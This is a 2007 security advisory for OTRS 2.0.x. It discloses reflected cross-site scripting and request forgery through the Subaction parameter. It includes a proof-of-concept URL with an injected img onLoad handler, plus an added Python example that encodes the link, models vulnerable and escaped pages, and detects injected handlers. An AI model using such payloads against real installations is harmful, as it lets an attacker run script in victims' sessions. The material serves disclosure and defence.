SECURITYVULNS:DOC:16950
May 08, 2007

OTRS <= 2.0.x XSS/XSRF

vulners.com

[VirtuaX ASCII-art banner]
Security without illusions
www.virtuax.be

                      Application: OTRS
              Vulnerable Versions: <= v2.0.x
                    Vulnerability: XSS/XSRF

                           Vendor: http://www.otrs.org
                    Vendor Status: Notified

                            Found: 07-05-2007
              Public Release Date: 07-05-2007
                    Last modified: 07-05-2007
                           Author: ciri
                           E-mail: ciri[a.t]virtuax[d.o.t]be
     
   reference: http://www.virtuax.be/advisories/Advisory5-07052007.txt

=================================================================================

Shouts to the VirtuaX Crew & Community!

=================================================================================

I. Background

"OTRS is an Open source Ticket Request System with many features to manage customer
telephone calls and e-mails. The system is built to allow your support, sales,
pre-sales, billing, internal IT, helpdesk, etc. department to react quickly to
inbound inquiries"
by otrs.org

II. Vulnerability

OTRS is vulnerable to reflected cross-site scripting (XSS): the value of the
Subaction parameter of index.pl is written back into the page without
HTML-encoding, so script supplied in a crafted link runs in the browser of
whoever opens it. Authentication is required to reach the targeted page, but an
unauthenticated victim is shown the login form and the injected markup is still
rendered there, so the attack succeeds regardless of session state. Because the
script executes in the victim's browser against the OTRS origin, it can also
issue requests that carry the victim's session, so cross-site request forgery
(XSRF) is possible by the same route.

IIa. Affected Versions

OTRS 2.0.4 was tested and is vulnerable. Version 2.2.0 was also tested and does
not appear to be affected. Only these two releases were tested; intermediate
releases between 2.0.4 and 2.2.0 were not checked.

III. PoC

http://server/otrs/index.pl?Action=AgentTicketMailbox&Subaction=<img src=
https://server/otrs/images/Standard/new-message.png onLoad=javascript:alert('hello');>

The URL is a single line (wrapped here for width) and is shown unencoded for
readability; when the link is actually delivered, the spaces and angle
brackets in the Subaction value must be URL-encoded. The "javascript:" prefix
inside the onLoad handler is harmless: in an event-handler attribute it is
parsed as a JavaScript label, and alert() still runs.
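The following Python script is an added example; it is not OTRS code and is not part of the original advisory. It builds a properly URL-encoded version of the PoC link, models the reported sink as a login page that reflects Subaction into page text (a constructed stand-in, since the advisory does not show the real template; a text-node sink is consistent with the payload being a bare <img> tag rather than an attribute break-out), tokenises the result the way a browser would to confirm the handler became live markup, and shows the hardened rendering with output encoding. The host name "server", the page layout and the function names are assumptions.

```python
"""Added example: model of the OTRS 2.0.x Subaction reflection.

This is NOT OTRS code. The login page below is a constructed stand-in for
a page that carries the requested Action/Subaction through authentication
and echoes them unescaped; host name "server" is assumed.
"""
import html
import urllib.parse
from html.parser import HTMLParser

# Payload taken from the advisory's PoC (host "server" is assumed).
PAYLOAD = ("<img src=https://server/otrs/images/Standard/new-message.png "
           "onLoad=javascript:alert('hello');>")


def build_poc_url(host: str = "server", subaction: str = PAYLOAD) -> str:
    """Percent-encode the PoC so it survives a browser or mail client.

    The advisory prints the link unencoded; spaces become '+', '<' becomes
    %3C and so on, which is what must actually be sent.
    """
    query = urllib.parse.urlencode(
        {"Action": "AgentTicketMailbox", "Subaction": subaction})
    return f"http://{host}/otrs/index.pl?{query}"


def render_login_vulnerable(action: str, subaction: str) -> str:
    """Constructed stand-in for the flawed pattern: the requested page is
    named in the login prompt so the user lands there afterwards, but the
    values are interpolated raw into HTML text."""
    return (
        f"<p>Please log in to continue to {action}/{subaction}.</p>"
        '<form method="post" action="/otrs/index.pl">'
        '<input name="User"><input name="Password" type="password">'
        "</form>"
    )


def render_login_hardened(action: str, subaction: str) -> str:
    """Same page with output encoding for an HTML text context.

    html.escape turns '<' into '&lt;' so the value can never open a tag;
    quote=True also neutralises quotes, which matters if the same value is
    ever reused inside an attribute."""
    return (
        f"<p>Please log in to continue to "
        f"{html.escape(action, quote=True)}/{html.escape(subaction, quote=True)}.</p>"
        '<form method="post" action="/otrs/index.pl">'
        '<input name="User"><input name="Password" type="password">'
        "</form>"
    )


class _HandlerFinder(HTMLParser):
    """Collects every on* event attribute the tokeniser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:          # attribute names arrive lowercased
            if name.startswith("on"):
                self.hits.append((tag, name, value or ""))


def injected_handlers(body: str) -> list[tuple[str, str, str]]:
    """Tokenise a response like a browser and return (tag, event, code)
    for every event handler. A non-empty list means the reflected value
    became live markup; an escaped reflection yields an empty list."""
    finder = _HandlerFinder()
    finder.feed(body)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    print(build_poc_url())
    print("vulnerable:", injected_handlers(
        render_login_vulnerable("AgentTicketMailbox", PAYLOAD)))
    print("hardened:  ", injected_handlers(
        render_login_hardened("AgentTicketMailbox", PAYLOAD)))
```

Running the script prints the encoded link, a single ("img", "onload", "javascript:alert('hello');") hit for the vulnerable rendering and an empty list for the hardened one. The same injected_handlers check can be pointed at the body of a real HTTP response to confirm whether a given OTRS build still reflects the value as markup.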

Copyright 2007 by ciri from Virtuax.be. All rights reserved.